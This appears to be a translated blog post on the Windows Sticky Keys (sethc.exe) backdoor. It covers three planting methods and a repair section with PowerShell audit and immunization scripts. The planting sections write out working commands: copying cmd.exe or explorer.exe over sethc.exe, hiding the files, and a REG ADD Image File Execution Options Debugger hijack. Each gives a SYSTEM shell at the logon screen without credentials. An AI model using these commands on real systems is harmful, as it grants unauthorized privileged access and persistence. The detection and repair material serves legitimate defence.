The Shift (Sticky Keys) backdoor: how it is planted and how to repair it

1. How the Shift backdoor is planted

Method 1

In a cmd window opened as an administrator, run the following commands:

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

attrib c:\windows\system32\sethc.exe +h

attrib c:\windows\system32\dllcache\sethc.exe +h

The first copy overwrites sethc.exe (the Sticky Keys helper) with explorer.exe; the second overwrites the copy in dllcache as well, so that Windows File Protection cannot silently restore the original. Pressing Shift five times at the logon screen makes the logon process start sethc.exe, which now is Explorer, and it runs as SYSTEM because nobody is logged on yet. You therefore get an Explorer shell with SYSTEM privileges without any credentials. The two attrib +h lines only hide the files from a casual directory listing; they do not change how they run. Note that this recipe targets Windows XP and Server 2003, where dllcache is the WFP cache. On Windows Vista and later the files under System32 are owned by TrustedInstaller, so the copy fails until you take ownership first (takeown /f on the file, then icacls to grant Administrators full control).

(Replace explorer.exe with cmd.exe in the commands above and the five Shift presses open a command prompt instead, giving you a shell running as SYSTEM.)

Method 2

Delete C:\WINDOWS\system32\dllcache\sethc.exe. This folder is the Windows File Protection cache; if the cached copy is left in place, Windows notices the changed file and automatically puts the original sethc.exe back.

Copy C:\WINDOWS\system32\cmd.exe, rename the copy sethc.exe, and put it back into C:\WINDOWS\system32, overwriting the original. The effect is the same as Method 1 with cmd.exe: five Shift presses at the logon screen give a SYSTEM command prompt.
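As an added example (not from the original post), the following PowerShell audit checks whether the file swap described in Methods 1 and 2 has been carried out on a machine. It goes slightly beyond the post by covering the other accessibility tools the logon screen can launch (utilman.exe, osk.exe and so on), since the same swap works against them. The list of impostor programs, the stock System32 layout and an elevated prompt are assumptions.

```powershell
# Added example, not part of the original post: audit the accessibility binaries that
# the logon screen can launch for the file swaps described in Methods 1 and 2.
# Assumptions: a stock %windir%\System32 layout and an elevated PowerShell prompt.
$accessibilityBinaries = 'sethc.exe', 'utilman.exe', 'osk.exe', 'Narrator.exe',
                         'Magnify.exe', 'DisplaySwitch.exe', 'AtBroker.exe'

# Programs an attacker typically copies over those binaries (assumed list). A renamed
# copy keeps its content, so its SHA-256 still matches the original cmd.exe / explorer.exe.
$impostorPaths = @(
    (Join-Path $env:windir 'System32\cmd.exe'),
    (Join-Path $env:windir 'explorer.exe'),
    (Join-Path $env:windir 'System32\WindowsPowerShell\v1.0\powershell.exe')
)
$impostorHashes = @{}
foreach ($p in $impostorPaths) {
    if (Test-Path -Path $p) {
        $impostorHashes[(Get-FileHash -Algorithm SHA256 -Path $p).Hash] = $p
    }
}

function Test-AccessibilityBinary {
    param([Parameter(Mandatory)][string]$Path)
    $findings = @()
    # -Force is required: Method 1 sets the hidden attribute to keep the swap out of sight.
    $item = Get-Item -Path $Path -Force -ErrorAction SilentlyContinue
    if (-not $item) {
        return [pscustomobject]@{ Path = $Path; Findings = @('file missing') }
    }
    $hash = (Get-FileHash -Algorithm SHA256 -Path $Path).Hash
    if ($impostorHashes.ContainsKey($hash)) {
        $findings += "byte-identical to $($impostorHashes[$hash])"
    }
    # The version resource travels with the file content, so a copy of cmd.exe renamed
    # to sethc.exe still reports OriginalFilename=Cmd.Exe. An Authenticode check would
    # not catch this: the renamed copy still carries Microsoft's valid signature.
    $orig     = [IO.Path]::GetFileNameWithoutExtension($item.VersionInfo.OriginalFilename)
    $expected = [IO.Path]::GetFileNameWithoutExtension($item.Name)
    if ($orig -and $orig -ne $expected) {        # -ne is case-insensitive in PowerShell
        $findings += "version resource says OriginalFilename=$($item.VersionInfo.OriginalFilename)"
    }
    if ($item.Attributes -band [IO.FileAttributes]::Hidden) {
        $findings += 'hidden attribute set (unusual for a System32 binary)'
    }
    [pscustomobject]@{ Path = $Path; Findings = $findings }
}

$sys32 = Join-Path $env:windir 'System32'
foreach ($name in $accessibilityBinaries) {
    $result = Test-AccessibilityBinary -Path (Join-Path $sys32 $name)
    if ($result.Findings.Count -gt 0) {
        Write-Warning ("{0}: {1}" -f $result.Path, ($result.Findings -join '; '))
    } else {
        Write-Host ("{0}: OK" -f $result.Path)
    }
}
```

The hash comparison only fires when the impostor is an unmodified copy of a system binary; the OriginalFilename check also catches copies that were taken from a different build or patched, which is why both are kept. A hit on either is grounds to restore the file (sfc /scannow or a copy from a clean installation of the same build) rather than just to delete it.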

Method 3

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

Command description: reg add adds a value under the given registry key. HKLM is the abbreviation of HKEY_LOCAL_MACHINE. Subkeys under Image File Execution Options (IFEO) are a debugging aid: when a process whose image name matches a subkey is started, Windows launches the program named in that subkey's Debugger value instead and hands it the original command line. This is what "image hijacking" means here, and the image being hijacked is sethc.exe, the Sticky Keys program. /v gives the value name (Debugger is fixed; it is the name Windows looks for), /t gives the type, the REG_SZ string type, and /d gives the data, the program to run in place of sethc.exe, here cmd.exe. Unlike Methods 1 and 2 this leaves sethc.exe itself untouched, so checking the files in System32 does not reveal it; the same trick works against the other accessibility tools reachable from the logon screen, such as utilman.exe, osk.exe, Magnify.exe and Narrator.exe.

2. Repair method

1. Run "regedit" to open the Registry Editor.

2. Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

If there is no sethc.exe key under this path:

Right-click Image File Execution Options, choose New > Key, and name the new key sethc.exe.

Right-click the new sethc.exe key, choose New > String Value, and name the value Debugger.

Double-click the new Debugger value and enter an arbitrary string such as afafagagag as its data. Because no program of that name exists, Windows fails to start sethc.exe at all, so five Shift presses at the logon screen do nothing.

After setting it, lock the key down: edit its permissions and deny Everyone the rights to delete the key and to set values, so the Debugger data cannot be quietly changed back to cmd.exe. Keep in mind that anyone who already holds administrator rights can take ownership of the key and remove the deny rule; the permission is a tripwire against casual tampering, not a security boundary.

If the sethc.exe key already exists:

Open the sethc.exe key and double-click the Debugger value on the right; change its data to something like afagagagag (any random string will do). This removes the hijack planted by Method 3, since cmd.exe is no longer launched, and at the same time immunizes the machine against the Shift backdoor being planted this way again. If sethc.exe itself was replaced (Methods 1 and 2), the registry change only stops the replaced file from launching; restore the genuine sethc.exe with sfc /scannow (or copy it from a clean installation of the same build) and clear the hidden attribute with attrib -h.
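As an added example (not from the original post), this PowerShell script lists every IFEO Debugger value on the machine, flags the ones that point an accessibility binary at a program that actually exists (a live Method 3 hijack, as opposed to the deliberately unusable Debugger the repair sets), and implements the repair described above: an unusable Debugger for sethc.exe plus a deny rule for Everyone on the key. The blocked path C:\nonexistent\sethc-blocked.exe and the extended list of accessibility binaries are assumptions; the IFEO key path is the one the article uses.

```powershell
# Added example, not part of the original post: audit the IFEO Debugger values that
# Method 3 abuses and apply the repair described above. Run from an elevated
# PowerShell prompt. The blocked Debugger path is an assumption and must not exist.
$ifeoKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$accessibilityBinaries = 'sethc.exe', 'utilman.exe', 'osk.exe', 'Narrator.exe',
                         'Magnify.exe', 'DisplaySwitch.exe', 'AtBroker.exe'

function Get-DebuggerExecutable {
    # First token of a Debugger command line: a quoted path, or everything up to the first space.
    param([string]$CommandLine)
    if ($CommandLine -match '^\s*"([^"]+)"') { return $Matches[1] }
    return ($CommandLine -split '\s+', 2)[0]
}

function Get-IfeoDebuggerFindings {
    # One object per IFEO subkey that carries a Debugger value. A Debugger on an
    # accessibility binary that resolves to a real program is a live hijack; one that
    # resolves to nothing is the immunization from the repair method.
    Get-ChildItem -Path $ifeoKey -ErrorAction SilentlyContinue | ForEach-Object {
        $debugger = (Get-ItemProperty -Path $_.PSPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($debugger) {
            $exe = Get-DebuggerExecutable -CommandLine $debugger
            $resolves = [bool](Get-Command -Name $exe -CommandType Application -ErrorAction SilentlyContinue)
            [pscustomobject]@{
                Image      = $_.PSChildName
                Debugger   = $debugger
                Resolves   = $resolves
                Suspicious = ($accessibilityBinaries -contains $_.PSChildName) -and $resolves
            }
        }
    }
}

function Set-SethcImmunization {
    param(
        [string]$Image = 'sethc.exe',
        [string]$BlockedDebugger = 'C:\nonexistent\sethc-blocked.exe'   # assumed; must not exist
    )
    $key = Join-Path $ifeoKey $Image
    if (-not (Test-Path -Path $key)) { New-Item -Path $key -Force | Out-Null }
    # Windows runs the Debugger instead of the image; a path that cannot exist means
    # five Shift presses at the logon screen start nothing at all. This also disables
    # Sticky Keys for legitimate users of this machine.
    Set-ItemProperty -Path $key -Name Debugger -Value $BlockedDebugger -Type String

    # Deny Everyone the rights needed to change the value or remove the key. Holders of
    # SeTakeOwnershipPrivilege (administrators) can still override this, so treat it as
    # a tripwire against casual tampering, not as a security boundary.
    $acl    = Get-Acl -Path $key
    $rights = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership'
    $rule   = New-Object System.Security.AccessControl.RegistryAccessRule(
        'Everyone', $rights,
        [System.Security.AccessControl.InheritanceFlags]::ContainerInherit,
        [System.Security.AccessControl.PropagationFlags]::None,
        [System.Security.AccessControl.AccessControlType]::Deny)
    $acl.AddAccessRule($rule)
    Set-Acl -Path $key -AclObject $acl
}

Get-IfeoDebuggerFindings | Format-Table -AutoSize
# Set-SethcImmunization    # uncomment to apply the repair to sethc.exe
# Set-SethcImmunization -Image 'utilman.exe'   # the same immunization for the Ease of Access button
```

Run the audit first and look at the Suspicious column: a Debugger of C:\windows\system32\cmd.exe on sethc.exe is the backdoor from Method 3, while the blocked path the repair writes shows Resolves = False and is not flagged. Undoing the repair later requires removing the deny rule before the value can be deleted.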


Source: blog.csdn.net/qq_32393893/article/details/108193449